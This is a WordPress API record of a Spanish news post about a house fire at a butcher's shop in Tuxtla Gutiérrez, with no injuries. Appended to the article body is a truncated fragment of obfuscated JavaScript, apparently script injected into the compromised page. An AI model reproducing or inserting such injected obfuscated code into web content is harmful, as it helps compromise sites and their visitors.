{"id":3407,"date":"2022-07-04T01:51:23","date_gmt":"2022-07-04T01:51:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3407"},"modified":"2022-07-04T01:51:24","modified_gmt":"2022-07-04T01:51:24","slug":"sofocan-incendio-de-vivienda-en-la-pencil","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3407","title":{"rendered":"Sofocan incendio de vivienda en la Pencil"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"750\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220703-WA0015.jpg\" alt=\"\" class=\"wp-image-3408\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220703-WA0015.jpg 1000w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220703-WA0015-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220703-WA0015-768x576.jpg 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><figcaption>Lo<\/figcaption><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 3 de julio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Este domingo por tarde se incendi\u00f3 la parte superior de un comercio habilitado como casa habitaci\u00f3n localizada en la Calzada el Pencil, a la altura de la Colonia Los Choferes.De acuerdo con los reportes oficiales, se inform\u00f3 a los n\u00fameros de emergencia que una carnicer\u00eda se estaba quemando, sin embargo, las llamas comenzaron en la parte superior por un presunto corto circuito.Al lugar arribaron rescatistas voluntarios de Club de Auxilio y Rescate de Chiapas y del cuerpo de Bomberos para controlar las llamas.En el lugar se inform\u00f3 que, el saldo fue de algunos aparatos quemados, muebles pero no hubo personas lesionadas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Lo Jairo Camacho.Agencia ReporteCiudadano, 3 de julio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Este domingo por tarde se incendi\u00f3 la parte superior de un comercio habilitado como casa habitaci\u00f3n localizada en la Calzada el Pencil, a la altura de la Colonia Los Choferes.De acuerdo con los reportes oficiales, se inform\u00f3 a los n\u00fameros de emergencia que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3408,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-3407","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3407","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3407"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3407\/revisions"}],"predecessor-version":[{"id":3409,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3407\/revisions\/3409"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3408"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3407"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3407"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3407"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}